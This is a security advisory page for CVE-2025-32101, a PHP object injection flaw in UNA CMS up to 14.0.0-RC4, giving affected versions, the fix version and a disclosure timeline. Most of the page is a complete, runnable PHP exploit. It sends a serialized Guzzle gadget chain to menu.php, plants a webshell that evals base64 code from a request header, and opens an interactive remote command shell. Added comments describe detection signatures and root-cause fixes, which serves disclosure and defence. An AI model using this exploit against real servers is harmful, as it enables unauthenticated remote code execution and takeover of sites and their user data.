## https://sploitus.com/exploit?id=PACKETSTORM:190366
------------------------------------------------------------------------------------
    UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection
    Vulnerability
    ------------------------------------------------------------------------------------
    
    
    [-] Software Links:
    
    https://unacms.com
    
    https://github.com/unacms/una
    
    
    [-] Affected Versions:
    
    All versions from 9.0.0-RC1 to 14.0.0-RC4.
    
    
    [-] Vulnerability Description:
    
    The vulnerability is located in the
    /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
    within the BxBaseMenuSetAclLevel::getCode() method. When calling this
    method, user input passed through the "profile_id" POST parameter is
    not properly sanitized before being used in a call to the
    unserialize() PHP function. This can be exploited by remote,
    unauthenticated attackers to inject arbitrary PHP objects into the
    application scope, allowing them to perform a variety of attacks, such
    as writing and executing arbitrary PHP code.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2025-32101.php
    
    
    [-] Solution:
    
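    Upgrade to version 14.0.0-RC5 or later. Because the issue is reachable
    without authentication, installations that were exposed while running an
    affected version should also be checked for unexpected files in
    web-accessible directories, such as the cache_public/ path used by the
    proof of concept below.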
    
    
    [-] Disclosure Timeline:
    
    [25/03/2025] - Vendor notified
    [29/03/2025] - CVE identifier requested
    [01/04/2025] - Version 14.0.0-RC5 released
    [04/04/2025] - CVE identifier assigned
    [07/04/2025] - Public disclosure
    
    
    [-] CVE Reference:
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    assigned the name CVE-2025-32101 to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    http://karmainsecurity.com/KIS-2025-01
    
    
    
    -------------
    Packet Storm appended proof of concept:
    
    
    <?php
    
    /*
        ------------------------------------------------------------------------------------
        UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
        ------------------------------------------------------------------------------------
    
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://unacms.com
    
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
    
        [-] Vulnerability Description:
    
        The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
        Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
        method, user input passed through the "profile_id" POST parameter is not properly
        sanitized before being used in a call to the unserialize() PHP function. This can be
        exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
        the application scope, allowing them to perform a variety of attacks, such as
        writing and executing arbitrary PHP code.
    
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2025-01
    */
    
    // Runtime setup for a command-line run: the execution time limit is removed
    // and only fatal errors are reported, so warnings and notices stay hidden.
    set_time_limit(0);
    error_reporting(E_ERROR);
    
    // Banner printed on every run.
    print "\n+------------------------------------------------------------+";
    print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
    print "\n+------------------------------------------------------------+\n";
    
    // All HTTP traffic below goes through the cURL extension; stop if it is missing.
    if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
    
    // Exactly one command-line argument is expected (the base URL of the UNA
    // installation); any other argument count prints the usage text and exits.
    if ($argc != 2)
    {
    	print "\nUsage......: php $argv[0] <URL>\n";
    	print "\nExample....: php $argv[0] http://localhost/una/";
    	print "\nExample....: php $argv[0] https://unacms.com/\n\n";
    	die();
    }
    
    // ON_APACHE only selects the extension of the file named by SH_PATH:
    // .phtml when true, .php otherwise. Both variants sit under ./cache_public/.
    // NOTE(review): for defenders, an unexpected sh.phtml or sh.php under
    // cache_public/ is the on-disk artifact of this PoC. Presumably the write
    // only becomes code execution because the web server runs PHP from that
    // directory, so script handling should be disabled for cache paths - confirm
    // against the deployment's web server configuration.
    define('ON_APACHE', true);
    define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
    
    /**
     * Local stand-in for GuzzleHttp\Cookie\SetCookie.
     *
     * It exists only to be serialized; the underscore name is rewritten to the
     * namespaced class name with str_replace() before the data is sent.
     *
     * NOTE(review): the 'Value' string is the PHP snippet that ends up in the written
     * file. It evaluates the base64-decoded content of $_SERVER['HTTP_C'], i.e. a
     * request header named "C", so that literal string is a usable content signature
     * when scanning web roots for this PoC.
     */
    class GuzzleHttp_Cookie_SetCookie
    {
    	// Cookie fields as serialized: an empty 'Expires' and the PHP snippet as 'Value'.
    	private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
    }
    
    /**
     * Local stand-in for GuzzleHttp\Cookie\FileCookieJar.
     *
     * Like the SetCookie stand-in, it is only serialized and then renamed to the
     * namespaced class; none of its code runs on the receiving side.
     *
     * NOTE(review): presumably the real FileCookieJar writes its cookies to $filename
     * when the object is destroyed, which is what turns deserialization into a file
     * write - confirm against the Guzzle version bundled with the affected release.
     * Any autoloadable class with such a destructor is reachable once request data is
     * passed to unserialize(), so the fix belongs at that call, not in the library.
     */
    class GuzzleHttp_Cookie_FileCookieJar
    {
    	// $filename is the SH_PATH location; $storeSessionCookies is set to true;
    	// $cookies is filled in by the constructor.
    	private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
    
    	// The jar carries exactly one cookie: the SetCookie stand-in holding the PHP snippet.
    	function __construct()
    	{
    		$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
    	}
    }
    
    // Base URL from the command line; this first cURL handle carries the injection request.
    $url = $argv[1];
    $ch  = curl_init();
    
    // Serialize the stand-in object graph, then swap the underscore class names for the
    // namespaced Guzzle names so that the receiving side resolves the real classes.
    // NOTE(review): the root cause is a server-side unserialize() on request data. Where
    // such a call cannot be removed, unserialize() accepts ['allowed_classes' => false]
    // to prevent object instantiation; strict validation of the parameter (presumably a
    // numeric profile id - confirm against the patched code) is the more direct fix.
    $chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
    $chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
    $chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
    
    // Request shape, usable as a log or WAF signature: a POST (implied by CURLOPT_POSTFIELDS)
    // to <base>menu.php with the header X-Requested-With: XMLHttpRequest and the body
    // o=sys_set_acl_level&a=SetAclLevel&level_id=1, where profile_id holds a URL-encoded
    // serialized PHP object naming GuzzleHttp\Cookie\FileCookieJar.
    // TLS peer and host verification are both switched off, so the server certificate is
    // not checked on https targets.
    curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
    
    print "\n[+] Performing PHP Object Injection";
    
    // The response is discarded; nothing here checks whether the request succeeded.
    curl_exec($ch); curl_close($ch);
    
    print "\n[+] Launching shell\n";
    
    // Second handle: requests the file named by SH_PATH under the base URL, again with
    // TLS peer and host verification switched off.
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    
    // Template for the code sent with each command: the output of shell_exec() on the
    // base64-decoded command, wrapped in '____' markers so it can be cut out of the response.
    $phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
    
    // Interactive loop: read a line from STDIN, stop on "exit", otherwise send the filled-in
    // template base64-encoded in a request header named "C" and print what the response
    // holds between the markers.
    // NOTE(review): detection points visible here are requests to cache_public/sh.phtml
    // (or sh.php), a request header literally named "C" carrying base64 data, and '____'
    // delimiters around command output in the response body.
    while(1)
    {
    	print "\nuna-shell# ";
    	if (($cmd = trim(fgets(STDIN))) == "exit") break;
    	curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    	// A response without the marker pair ends the run with the failure message.
    	preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
    }